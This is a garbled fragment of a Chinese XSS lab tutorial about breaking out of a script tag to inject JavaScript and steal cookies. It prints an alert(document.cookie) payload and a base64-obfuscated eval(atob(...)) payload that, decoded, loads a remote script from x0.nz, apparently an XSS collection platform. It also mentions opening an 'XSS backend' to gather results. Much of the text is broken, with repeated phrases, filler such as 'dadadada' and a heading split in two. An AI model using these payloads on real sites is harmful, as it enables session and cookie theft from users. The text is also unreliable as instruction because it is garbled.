打开xss之js,我们随意输入然后查看页内原码。
我们输入tmac
复制全文
我们尝试造成闭合,我们尝试造成闭合,输入x'</script><script>alert(document.cookie)</script>
,先将前面的script闭合再插入我们自己的语句。
复制文章有惊喜哦哦test
我们尝试造成闭合,我们尝试造成闭合,输入x'</script><script>eval(atob("dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veDAubnovY3YzTCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs="))</script>
,先将前面的script闭合再插入我们自己的语句。
XSS的危害-获
dadadada
取cookie的原理和演示
get型xss利用
在管理工具中打开xss后台